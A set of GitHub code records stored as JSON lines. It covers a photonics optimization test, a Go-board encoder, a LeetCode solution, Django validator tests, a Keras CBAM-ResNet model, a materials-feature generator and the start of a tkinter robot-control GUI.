len(self.geometry.bounds)\n # Note: bounds are tweaked since the shape boundary approximation method does not work\n # when the shape under optimization touches the boundary of the FDTD region.\n opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','2D');\", \n wavelengths = self.wavelengths,\n fom = self.fom,\n geometry = self.geometry,\n optimizer = self.optimizer,\n hide_fdtd_cad = True,\n use_deps = False,\n plot_history = False,\n store_all_simulations = False)\n fom, params = opt.run()\n self.assertGreaterEqual(fom, 0.972)\n self.assertAlmostEqual(params[0], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n self.assertAlmostEqual(params[1], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n\n def test_shape_boundary_approximation_in_3D(self):\n print(\"3D optimization with shape boundary approximation (use_deps = False): \")\n self.geometry.bounds = [(0.0, self.wg_width / 2.0 - self.mesh_del)] * len(self.geometry.bounds)\n # Note: bounds are tweaked since the shape boundary approximation method does not work\n # when the shape under optimization touches the boundary of the FDTD region.\n opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','3D');\", \n wavelengths = self.wavelengths,\n fom = self.fom,\n geometry = self.geometry,\n optimizer = self.optimizer,\n hide_fdtd_cad = True,\n use_deps = False,\n plot_history = False,\n store_all_simulations = False)\n fom, params = opt.run()\n self.assertGreaterEqual(fom, 0.972)\n self.assertAlmostEqual(params[0], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n self.assertAlmostEqual(params[1], (self.wg_width / 2.0 - self.mesh_del) * self.optimizer.scaling_factor)\n\nif __name__ == \"__main__\":\n run([__file__])","repo_name":"chriskeraly/lumopt","sub_path":"QA/optimization_parallel_plate_waveguide_TE_test.py","file_name":"optimization_parallel_plate_waveguide_TE_test.py","file_ext":"py","file_size_in_byte":8592,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"3"} +{"seq_id":"35398060344","text":"from typing import Any, Union, Tuple\nimport numpy as np\nfrom ..encoder.base import Encoder\nfrom ..goboard import Move\nfrom ..gotypes import Player, Point\n\"\"\"\n如果没有见过以往落子序列的情况,仅仅根据当前棋盘的状态是无法判断`劫争`的. 如果我们使用\n`OnePlaneEncoder`来编码棋盘, 只使用一个平面, 将黑子编码为-1, 白子编码为1, 空白编码为0. \n是无法判断`劫争`的情况的.\n\nSimpleEncoder使用了11个平面, 除了对`劫争`进行显式的编码, 还对棋子剩余的气数进行了建模和编码,\n并区分黑子和白子. 只剩下一口气的棋子由于下一回合就可能被吃掉, 因此具有额外的战术意义. 由于新的模型\n可以直接`看到`这个属性, 就能更容易的了解它对棋局的影响. 为劫争和气数单独创造特征平面, 实际上相当于\n给模型增加了提示, 强调了这些概念的重要性\n\"\"\"\n\n\nclass SimpleEncoder(Encoder):\n \"\"\"\n 0 - 剩1口气的黑棋编码为1, 其它棋子编码为0\n 1 - 有2口气的黑棋编码为1, 其它棋子编码为0\n 2 - 有3口气的黑棋编码为1, 其它棋子编码为0\n 3 - 有4口气(及以上)的黑棋编码为1, 其它棋子编码为0\n 4 - 剩1口气的白棋编码为1, 其它棋子编码为0\n 5 - 有2口气的白棋编码为1, 其它棋子编码为0\n 6 - 有3口气的白棋编码为1, 其它棋子编码为0\n 7 - 有4口气(及以上)的白棋编码为1, 其它棋子编码为0\n 8 - 如果是黑方回合, 这个平面设置为1\n 9 - 如果是白方回合, 这个平面设置为1\n 10 - 由于劫争而不能落子的点\n \"\"\"\n\n def __init__(self, board_size: Union[Tuple[int, int], int]) -> None:\n if isinstance(board_size, int):\n board_size = (board_size, board_size)\n self.board_width, self.board_height = board_size\n self.num_planes = 11\n\n def name(self) -> str:\n return 'simple'\n\n def encode(self, game_state: Any) -> np.ndarray:\n \"\"\"\n 参数:\n game_state: 游戏状态\n\n 返回:\n board_matrix: [num_planes=11, board_height, board_width]\n \"\"\"\n board_tensor = np.zeros(self.shape())\n if game_state.next_player == Player.black:\n # 8 - 如果是黑方回合, 这个平面设置为1\n board_tensor[8] = 1\n else:\n # 9 - 如果是白方回合, 这个平面设置为1\n board_tensor[9] = 1\n # 遍历棋盘的每个位置\n for r in range(self.board_height):\n for c in range(self.board_width):\n p = Point(row=r + 1, col=c + 1)\n go_string = game_state.board.get_go_string(p)\n\n if go_string is None:\n # 10 - 由于劫争而不能落子的点\n if game_state.does_move_violate_ko(game_state.next_player,\n Move.play(p)):\n board_tensor[10][r][c] = 1\n else:\n liberty_plane = min(4, go_string.num_liberties) - 1\n if go_string.color == Player.white:\n liberty_plane += 4\n board_tensor[liberty_plane][r][c] = 1\n\n return board_tensor\n\n def encode_point(self, point: Point) -> int:\n \"\"\"\n 将围棋棋盘上的交叉点(point)转换为整数索引\n\n point -> index\n \"\"\"\n return self.board_width * (point.row - 1) + (point.col - 1)\n\n def decode_point_index(self, index: int) -> Point:\n \"\"\"\n 将整数索引转换为围棋棋盘上的交叉点(point)\n\n index -> point\n \"\"\"\n row = index // self.board_width\n col = index % self.board_width\n return Point(row=row + 1, col=col + 1)\n\n def num_points(self) -> int:\n \"\"\"\n 棋盘上交叉点的总数, 也就是棋盘的宽度x高度\n \"\"\"\n return self.board_width * self.board_height\n\n def shape(self) -> Tuple[int, int, int]:\n \"\"\"\n 棋盘编码后的shape\n\n 返回:\n [num_planes=11, board_height, board_width]\n \"\"\"\n return self.num_planes, self.board_height, self.board_width\n\n\ndef create(board_size: Union[Tuple[int, int], int]) -> SimpleEncoder:\n \"\"\"\n 创建SimpleEncoder\n \"\"\"\n return SimpleEncoder(board_size)","repo_name":"relaxdl/relaxml","sub_path":"relaxml/relaxgo/encoder/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19556835959","text":"from typing import List\n\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n d = dict()\n for num in nums:\n left, right = num, num\n if num + 1 in d and d[num + 1] > num:\n right = d[num + 1]\n del d[num + 1]\n if num - 1 in d and d[num - 1] < num:\n left = d[num - 1]\n del d[num - 1]\n if left == right:\n if left not in d:\n d[left] = left\n else:\n if left not in d or right > d[left]:\n d[left] = right\n\n if right not in d or left < d[right]:\n d[right] = left\n max = 0\n for key in d:\n v = d[key] - key + 1\n if max < v:\n max = v\n return max\n\n\nif __name__ == '__main__':\n s = Solution()\n a = [-7, -1, 3, -9, -4, 7, -3, 2, 4, 9, 4, -9, 8, -7, 5, -1, -7]\n re = s.longestConsecutive(a)\n print(re)\n","repo_name":"jackmiking/leetcode","sub_path":"LongestConsecutive.py","file_name":"LongestConsecutive.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36506493598","text":"\nimport numpy as np\n\nx1=open('X-auxilary.csv','w')\n\ndef distance(pt_1, pt_2):\n\tdist=np.sqrt((pt_2[0]-pt_1[0])**2+(pt_2[1]-pt_1[1])**2)\n\treturn dist\n\nwell_1=[1,1]\nwell_2=[15,1]\nwell_3=[15,55]\nwell_4=[1,55]\nboundry=[15,55]\n\n\n\nposition_file = open('/media/nandita/ND/Research/1_CNN_infill/spe10model2/SPE10 MODEL2 UPSCALED/data/position_file.txt','r')\nposition_infil = position_file.readlines()\nfor i in position_infil:\n\tparts=i.split(';')\n\txin=int(parts[0])\n\tyin=int(parts[1])\n\tinfil_well=[xin,yin]\n\tdw1=distance(well_1,infil_well)\n\tdw2=distance(well_2,infil_well)\n\tdw3=distance(well_3,infil_well)\n\tdw4=distance(well_4,infil_well)\n\tdw5=distance(boundry,infil_well)\n\t\n\tx1.write(str(dw1) + ',' + str(dw2) + ',' + str(dw3) + ',' + str(dw4) + ',' + str(dw5))\n\tx1.write('\\n')\n\t\nx1.close()","repo_name":"nanditadoloi/cnn-infill-optimization","sub_path":"Reference/X-auxilary.py","file_name":"X-auxilary.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29027637317","text":"import pytest\n\nfrom django.core.exceptions import ValidationError\n\nfrom kelvin.courses.models.criterion.action import validate_actions\n\n\nclass TestActionValidator:\n def test_invalid_my_action(self):\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": \"MYACT1\"}])\n\n def test_valid_my_action(self):\n assert validate_actions([{\"type\": \"MYACT\"}]) is None\n\n def test_course_completion_valid(self):\n assert validate_actions([{\"type\": \"COURSE_COMPLETION\"}]) is None\n assert validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": []}]) is None\n assert validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": [1,2,3,4]}]) is None\n\n def test_course_completion_invalid(self):\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": \"\"}])\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": [\"1\", \"2\"]}])\n\n def test_clesson_completion_invalid(self):\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": \"CLESSON_COMPLETION1\"}])\n\n def test_clesson_completion_valid(self):\n assert validate_actions([{\"type\": \"CLESSON_COMPLETION\"}]) is None\n\n ACTION_REQUEST_DATA_INVALID = (\n (\n {\n \"achievement_id\": -1,\n \"level\": -2,\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": 1,\n \"level\": -2,\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": -1,\n \"level\": -1,\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": 1,\n \"level\": -1,\n }\n ),\n )\n\n @pytest.mark.parametrize('request_data', ACTION_REQUEST_DATA_INVALID)\n def test_request_achievement_action_invalid(self, request_data):\n request_dict = {\n **{\"type\": \"REQUEST_ACHIEVEMENT_ACTION\"}, **request_data,\n }\n\n with pytest.raises(ValidationError):\n validate_actions(\n [\n request_dict,\n ]\n )\n\n ACTION_REQUEST_DATA_VALID = (\n (\n {\n \"achievement_id\": 1,\n \"level\": \"-1\",\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": 1,\n \"level\": \"1\",\n \"comment\": \"qwerty\",\n }\n ),\n )\n\n @pytest.mark.parametrize('request_data', ACTION_REQUEST_DATA_VALID)\n def test_request_achievement_action_valid(self, request_data):\n request_dict = {\n **{\"type\": \"REQUEST_ACHIEVEMENT_ACTION\"}, **request_data,\n }\n\n assert validate_actions([request_dict]) is None\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/test_actions.py","file_name":"test_actions.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10756939353","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('liberator_api', '0002_usermeta'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Book',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=600)),\n ('author', models.CharField(max_length=50)),\n ('description', models.TextField(blank=True)),\n ('cover', models.ImageField(upload_to=b'covers/', blank=True)),\n ('ISBN', models.CharField(max_length=14, blank=True)),\n ],\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='avatar',\n field=models.ImageField(upload_to=b'user_avatars/', blank=True),\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='description',\n field=models.TextField(blank=True),\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='displayName',\n field=models.CharField(max_length=50, blank=True),\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='tagline',\n field=models.CharField(max_length=100, blank=True),\n ),\n ]\n","repo_name":"almithani/liberator_api","sub_path":"liberator_api/migrations/0003_auto_20151202_1724.py","file_name":"0003_auto_20151202_1724.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33044350623","text":"import tensorflow as tf\r\nfrom keras import layers\r\nfrom keras.layers import Reshape\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n# Load the SSDResNet50 architecture\r\nmodel = tf.keras.applications.ResNet50(\r\n include_top=False,\r\n weights=None,\r\n input_shape=(224, 224, 3)\r\n)\r\n\r\nclass CBAM(tf.keras.layers.Layer):\r\n def __init__(self, reduction_ratio=8, name=None):\r\n super(CBAM, self).__init__(name=name)\r\n self.reduction_ratio = reduction_ratio\r\n self.fc1 = tf.keras.layers.Dense(units=1024, activation='relu')\r\n self.fc2 = tf.keras.layers.Dense(units=512, activation='relu')\r\n self.conv2d_1 = tf.keras.layers.Conv2D(filters=1, kernel_size=3, padding='same')\r\n self.conv2d_2 = tf.keras.layers.Conv2D(filters=1, kernel_size=3, padding='same')\r\n self.reshape = tf.keras.layers.Reshape((-1, 1, 1))\r\n \r\n def call(self, inputs):\r\n # Global Average Pooling\r\n gap = tf.keras.layers.GlobalAveragePooling2D()(inputs)\r\n gap_reshaped = tf.keras.layers.Reshape((1, 1, gap.shape[-1]))(gap)\r\n print(gap_reshaped.shape)\r\n mp = tf.keras.layers.Conv2D(gap.shape[-1], (1, 1), padding='same')(inputs)\r\n print(mp.shape)\r\n merged = tf.keras.layers.Concatenate(axis=-1)([gap_reshaped, mp])\r\n\r\n # FC layers\r\n x = self.fc1(merged)\r\n x = self.fc2(x)\r\n\r\n # Channel Attention\r\n ca = tf.reduce_mean(x, axis=[1, 2], keepdims=True)\r\n ca = self.conv2d_1(ca)\r\n ca = tf.nn.sigmoid(ca)\r\n x = x * ca\r\n\r\n # Spatial Attention\r\n sa = self.conv2d_2(x)\r\n sa = self.reshape(sa)\r\n sa = tf.nn.sigmoid(sa)\r\n x = x * sa\r\n\r\n return x\r\n \r\n\r\nclass CBAMResBlock(tf.keras.layers.Layer):\r\n def __init__(self, filters, kernel_size, stride=1, downsample=None):\r\n super(CBAMResBlock, self).__init__()\r\n\r\n self.conv1 = tf.keras.layers.Conv2D(filters=filters,\r\n kernel_size=kernel_size,\r\n strides=stride,\r\n padding='same')\r\n self.bn1 = tf.keras.layers.BatchNormalization()\r\n self.cbam = CBAM()\r\n self.conv2 = tf.keras.layers.Conv2D(filters=filters,\r\n kernel_size=kernel_size,\r\n strides=1,\r\n padding='same')\r\n self.bn2 = tf.keras.layers.BatchNormalization()\r\n self.relu = tf.keras.layers.ReLU()\r\n self.downsample = downsample\r\n\r\n def call(self, inputs, training=False):\r\n identity = inputs\r\n\r\n x = self.conv1(inputs)\r\n x = self.bn1(x, training=training)\r\n x = self.cbam(x)\r\n x = self.relu(x)\r\n\r\n x = self.conv2(x)\r\n x = self.bn2(x, training=training)\r\n\r\n if self.downsample is not None:\r\n identity = self.downsample(inputs)\r\n\r\n x += identity\r\n x = self.relu(x)\r\n\r\n return x\r\n \r\ndef make_cbam_resnet50(input_shape, num_classes, reduction_ratio=8):\r\n inputs = tf.keras.Input(shape=input_shape)\r\n\r\n # Initial Convolutional Layers\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=7, strides=2, padding='same')(inputs)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.Activation('relu')(x)\r\n x = tf.keras.layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(x)\r\n\r\n # Residual Layers with CBAM\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.Activation('relu')(x)\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = CBAM(reduction_ratio=reduction_ratio)(x)\r\n shortcut = tf.keras.layers.Conv2D(filters=64, kernel_size=1, strides=1, padding='same')(inputs)\r\n shortcut = tf.keras.layers.BatchNormalization()(shortcut)\r\n x = tf.keras.layers.Add()([x, shortcut])\r\n x = tf.keras.layers.Activation('relu')(x)\r\n\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.Activation('relu')(x)\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = CBAM(reduction_ratio=reduction_ratio)(x)\r\n x = tf.keras.layers.Add()([x, shortcut])\r\n x = tf.keras.layers.Activation('relu')(x)\r\n\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = tf.keras.layers.Activation('relu')(x)\r\n x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n x = tf.keras.layers.BatchNormalization()(x)\r\n x = CBAM(reduction_ratio=reduction_ratio)(x)\r\n x = tf.keras.layers.Add()([x, shortcut])\r\n x = tf.keras.layers.Activation('relu')(x)\r\n\r\n # Final Classification Layers\r\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\r\n x = tf.keras.layers.Dense(units=num_classes, activation='softmax')(x)\r\n\r\n model = tf.keras.Model(inputs=inputs, outputs=x, name='cbam_resnet50')\r\n return model\r\n\r\n# Sample training script\r\ntrain_datagen = ImageDataGenerator(rescale=1./255, validation_split=0.2)\r\n\r\ntrain_generator = train_datagen.flow_from_directory('./data/train',\r\n target_size=(224, 224),\r\n batch_size=32,\r\n class_mode='categorical',\r\n subset='training'\r\n)\r\n\r\nvalidation_generator = train_datagen.flow_from_directory('./data/test',\r\n target_size=(224, 224),batch_size=32,\r\nclass_mode='categorical',\r\nsubset='validation'\r\n)\r\n\r\nmodel = make_cbam_resnet50(input_shape=(224, 224, 3), num_classes=10)\r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.fit(train_generator, validation_data=validation_generator, epochs=10)","repo_name":"samuelokpor/modiffed-SSD-with-Attention-Mechanisms","sub_path":"mainutils.py","file_name":"mainutils.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36768158130","text":"import pandas as pd\nimport numpy as np\nimport types\nfrom ....data.materials.CrystalStructureEntry import CrystalStructureEntry\n\nclass StructuralHeterogeneityAttributeGenerator:\n \"\"\"Class to compute attributes based on heterogeneity in structure.\n Measures variance in bond lengths (both for a single atom and between\n different atoms) and atomic volumes. Also considers the number of unique\n coordination polyhedron shapes.\n Bond lengths, atomic volumes, and coordination polyhedra are based on the\n Voronoi tessellation of the structure.\n\n Notes\n -----\n Current attributes:\n 1. Mean absolute deviation in average bond length for each atom, normalized\n by mean for all atoms.\n 2. Minimum in average bond length, normalized by mean for all atoms.\n 3. Maximum in average bond length, normalized by mean for all atoms.\n 4. Mean bond length variance between bonds across all atom.\n 5. Mean absolute deviation in bond length variance.\n 6. Minimum bond length variance.\n 7. Maximum bond length variance.\n 8. Mean absolute deviation in atomic volume, normalized by mean atomic\n volume.\n\n Here, bond length variation for a single atom is defined as:\n .. math:: \\hat{l} = \n where :math: `l_i` is the distance between an atom and one of its\n neighbors.\n\n \"\"\"\n\n def generate_features(self, entries):\n \"\"\"Function to generate features as mentioned in the class description.\n\n Parameters\n ----------\n entries : array-like\n Crystal structures for which features are to be generated. A list\n of CrystalStructureEntry's.\n\n Returns\n ----------\n features : DataFrame\n Features for the given entries. Pandas data frame containing the\n names and values of the descriptors.\n\n Raises\n ------\n ValueError\n If input is not of type list.\n If items in the list are not CrystalStructureEntry instances.\n\n \"\"\"\n\n # Initialize lists of feature values and headers for pandas data frame.\n feat_values = []\n feat_headers = []\n\n # Raise exception if input argument is not of type list of\n # CompositionEntry's.\n if not isinstance(entries, list):\n raise ValueError(\"Argument should be of type list of \"\n \"CrystalStructureEntry's\")\n elif (entries and not isinstance(entries[0], CrystalStructureEntry)):\n raise ValueError(\"Argument should be of type list of \"\n \"CrystalStructureEntry's\")\n\n # Insert header names here.\n feat_headers.append(\"var_MeanBondLength\")\n feat_headers.append(\"min_MeanBondLength\")\n feat_headers.append(\"max_MeanBondLength\")\n feat_headers.append(\"mean_BondLengthVariation\")\n feat_headers.append(\"var_BondLengthVariation\")\n feat_headers.append(\"min_BondLengthVariation\")\n feat_headers.append(\"max_BondLengthVariation\")\n feat_headers.append(\"var_CellVolume\")\n\n l_fh = len(feat_headers)\n # Generate features for each entry.\n for entry in entries:\n tmp_list = []\n # Get the Voronoi tessellation.\n try:\n voro = entry.compute_voronoi_tessellation()\n except Exception:\n tmp_list = [np.nan] * l_fh # If tessellation fails.\n feat_values.append(tmp_list)\n continue\n\n # Bond length features.\n # Variation between cells.\n mean_bond_lengths = voro.mean_bond_lengths()\n mean_bond_lengths /= np.mean(mean_bond_lengths) # Normalize bond\n # lengths.\n m = np.mean(mean_bond_lengths)\n tmp_list.append(np.mean([abs(x - m) for x in mean_bond_lengths]))\n tmp_list.append(np.min(mean_bond_lengths))\n tmp_list.append(np.max(mean_bond_lengths))\n\n # Variation within a single cell.\n mean_bond_lengths = voro.mean_bond_lengths() # Recompute bond\n # lengths.\n bond_length_variation = voro.bond_length_variance(\n mean_bond_lengths)\n # Normalize bond length variation by mean bond length of each cell.\n bond_length_variation /= mean_bond_lengths\n m = np.mean(bond_length_variation)\n tmp_list.append(m)\n tmp_list.append(np.mean([abs(x - m) for x in\n bond_length_variation]))\n tmp_list.append(np.min(bond_length_variation))\n tmp_list.append(np.max(bond_length_variation))\n\n # Cell volume / shape features.\n tmp_list.append(voro.volume_variance() * entry.get_structure(\n ).n_atoms() / entry.get_structure().volume())\n\n feat_values.append(tmp_list)\n\n features = pd.DataFrame(feat_values, columns=feat_headers)\n return features\n","repo_name":"hachmannlab/chemml","sub_path":"chemml/chem/magpie_python/attributes/generators/crystal/StructuralHeterogeneityAttributeGenerator.py","file_name":"StructuralHeterogeneityAttributeGenerator.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"3"} +{"seq_id":"27764789839","text":"import tkinter as tk\nimport json\nimport time\nimport subprocess\nimport sys\nimport psutil\nimport os\n\n# Create the main window\nroot = tk.Tk()\nroot.geometry(\"960x540\")\nroot.title(\"LYNY\")\n\nemergency_stop_status = False\nnitros_on_status = False\ncrawl_on_status = False\n\nw_status = False\na_status = False\ns_status = False\nd_status = False\n\ntest_process = None\n#8 17\n\n# Function to create a rounded rectangle\ndef round_rectangle(canvas, x1, y1, x2, y2, radius, **kwargs):\n points = [x1 + radius, y1,\n x1 + radius, y1,\n x2 - radius, y1,\n x2 - radius, y1,\n x2, y1,\n x2, y1 + radius,\n x2, y1 + radius,\n x2, y2 - radius,\n x2, y2 - radius,\n x2, y2,\n x2 - radius, y2,\n x2 - radius, y2,\n x1 + radius, y2,\n x1 + radius, y2,\n x1, y2,\n x1, y2 - radius,\n x1, y2 - radius,\n x1, y1 + radius,\n x1, y1 + radius,\n x1, y1]\n\n return canvas.create_polygon(*points, **kwargs, smooth=True)\n\n# Define the coordinates and dimensions for the four main parts\npart1 = (44, 74, 460, 250)\npart2 = (44, 290, 460, 520)\npart3 = (501, 74, 916, 304)\npart4 = (501, 340, 916, 516)\ntop_bar = (0, 0, 960, 54)\n\n# Create a canvas to draw the rounded rectangles\ncanvas = tk.Canvas(root, width=960, height=540, background=\"#ebebeb\")\ncanvas.pack()\n\n# Function to update the top bar sections with JSON data\ndef update_top_bar(data):\n top_bar_part1_text = f\"Serial Port: {data.get('serial_port', 'N/A')}\"\n\n top_bar_part2_text = f\"Baud Rate: {data.get('baud_rate', 'N/A')}\"\n\n if 'connected' in data:\n if data['connected']:\n top_bar_part3_fill = \"green\"\n top_bar_part3_text = \"Connected\"\n else:\n top_bar_part3_fill = \"black\"\n top_bar_part3_text = \"Not Connected\"\n else:\n # Handle the case where 'connected' key is not present in 'data'\n top_bar_part3_fill = \"black\"\n top_bar_part3_text = \"Not Connected\"\n \n # Update the text on the canvas items\n canvas.itemconfig(top_bar_part1_text_item, text=top_bar_part1_text)\n canvas.itemconfig(top_bar_part2_text_item, text=top_bar_part2_text,font =144)\n canvas.itemconfig(top_bar_part3_text_item, text=top_bar_part3_text, fill=top_bar_part3_fill, font =144)\n\ndef calculate_duty_cycle(dac_value):\n # Calculate y using the equation y = 0.3631x + 1E-13\n y = 0.3631 * dac_value + 1E-13\n return y\n\n# Read the JSON data from a file\nwith open('to_gui.json', 'r') as file:\n json_data = json.load(file)\n\n# Draw the four main rounded rectangles with the specified fill colors\nround_rectangle(canvas, *part1, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *part2, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *part3, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *part4, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *top_bar, radius=0, fill=\"gray\")\n\n# Add additional parts in the top bar with corner radius of 14 and specified dimensions and colors\ntop_bar_part1 = (44, 10, 230, 46)\ntop_bar_part2 = (252, 10, 438, 46)\ntop_bar_part3 = (501, 10, 687, 46)\ntop_bar_part4 = (730, 10, 916, 46)\n\nif json_data['connected']:\n contfill = \"#42fe65\"\nelse:\n contfill = \"#fe4243\"\n\n\nround_rectangle(canvas, *top_bar_part1, radius=14, fill=\"#ebebeb\")\nround_rectangle(canvas, *top_bar_part2, radius=14, fill=\"#ebebeb\")\nround_rectangle(canvas, *top_bar_part3, radius=14, fill=contfill)\nround_rectangle(canvas, *top_bar_part4, radius=14, fill=\"#515151\")\n\n# Create text items to display information in the top bar with \"Syne\" font\nfont = (\"Syne\", 11)\n\ntop_bar_part1_text_item = canvas.create_text(137, 28, text=\"\", fill=\"black\", font=font)\ntop_bar_part2_text_item = canvas.create_text(345, 28, text=\"\", fill=\"black\", font=font)\ntop_bar_part3_text_item = canvas.create_text(594, 28, text=\"\", fill=\"white\", font=font)\n\n\n\n# Create text items to display information in part1 with the updated coordinates\nfont_size_24 = (\"Syne\", 24)\nfont_size_20 = (\"Syne\", 20)\n\n\n# Change the coordinates for the text items\nright_sensor_label_item = canvas.create_text(140, 100, text=\"\", fill=\"black\", font=font_size_24)\nright_value_text_item = canvas.create_text(255, 100, text=\"\", fill=\"#23D692\", font=font_size_20)\nright_color_text_item = canvas.create_text(337, 100, text=\"\", fill=\"black\", font=font_size_20)\n\nleft_sensor_label_item = canvas.create_text(135, 138, text=\"\", fill=\"black\", font=font_size_24)\nleft_value_text_item = canvas.create_text(255, 138, text=\"\", fill=\"#23D692\", font=font_size_20)\nleft_color_text_item = canvas.create_text(337, 138, text=\"\", fill=\"black\", font=font_size_20)\n\n# Function to update part1 with JSON data\ndef update_part1(data):\n right_sensor_label = f\"Right Sensor\"\n right_value_text = f\"{data.get('right_value', 'N/A')}\"\n right_color_text = f\"{data.get('right_color', 'N/A')}\"\n\n \n left_sensor_label = f\"Left Sensor\"\n left_value_text = f\"{data.get('left_value', 'N/A')}\"\n left_color_text = f\"{data.get('left_color', 'N/A')}\"\n\n # Update the text on the canvas items\n canvas.itemconfig(right_sensor_label_item, text=right_sensor_label)\n canvas.itemconfig(right_value_text_item, text=right_value_text)\n canvas.itemconfig(right_color_text_item, text=right_color_text)\n \n canvas.itemconfig(left_sensor_label_item, text=left_sensor_label)\n canvas.itemconfig(left_value_text_item, text=left_value_text)\n canvas.itemconfig(left_color_text_item, text=left_color_text)\n\n\n# Use the get method with a default value of 'N/A' for dac1_value\ndac1_value = json_data.get('dac1_value', 'N/A')\n\n# Use the get method with a default value of 'N/A' for dac2_value\ndac2_value = json_data.get('dac2_value', 'N/A')\n\n\n# Calculate duty cycles using the given equation\ndac1_duty_cycle = (0.3631 * dac1_value + 1E-13)/100\ndac2_duty_cycle = (0.3631 * dac2_value + 1E-13)/100\n# Create text items for the duty cycles\ndac1_duty_cycle_label_item = canvas.create_text(140, 175, text=\"Duty Cycles:\", fill=\"black\", font=font_size_24)\ndac1_duty_cycle_text_item = canvas.create_text(260, 175, text=\"\", fill=\"black\", font=font_size_20)\ndac2_duty_cycle_text_item = canvas.create_text(337, 175, text=\"\", fill=\"black\", font=font_size_20)\n\n# Function to calculate and update DAC duty cycles\ndef update_dac_duty_cycles(dac1_value,dac2_value):\n\n \n\n if isinstance(dac1_value, (int, float)):\n dac1_duty_cycle = (0.3631 * dac1_value + 1E-13) / 100\n else:\n # Handle the case where dac1_value is not numeric\n dac1_duty_cycle = 0 # or set a default value or take appropriate action\n \n # Check if dac1_value is numeric before performing the calculation\n if isinstance(dac2_value, (int, float)):\n dac2_duty_cycle = (0.3631 * dac2_value + 1E-13) / 100\n else:\n # Handle the case where dac1_value is not numeric\n dac2_duty_cycle = 0 # or set a default value or take appropriate action\n\n\n # Update the text on the canvas items\n canvas.itemconfig(dac1_duty_cycle_text_item, text=f\"{dac1_duty_cycle:.2%}\")\n canvas.itemconfig(dac2_duty_cycle_text_item, text=f\"{dac2_duty_cycle:.2%}\")\n\n return dac1_duty_cycle, dac2_duty_cycle \n\n# Add text label for the threshold\nthreshold_label_item = canvas.create_text(130, 213, text=\"Threshold:\", fill=\"black\", font=font_size_24)\n\n# Add a slider with a default value of 500\nslider = tk.Scale(root, from_=0, to=1000, orient='horizontal', length=200, troughcolor=\"white\", sliderlength=20)\nslider.set(500) # Set the initial value to 500\nslider_item = canvas.create_window(340, 213, window=slider)\n\n\nlive_motion_text = 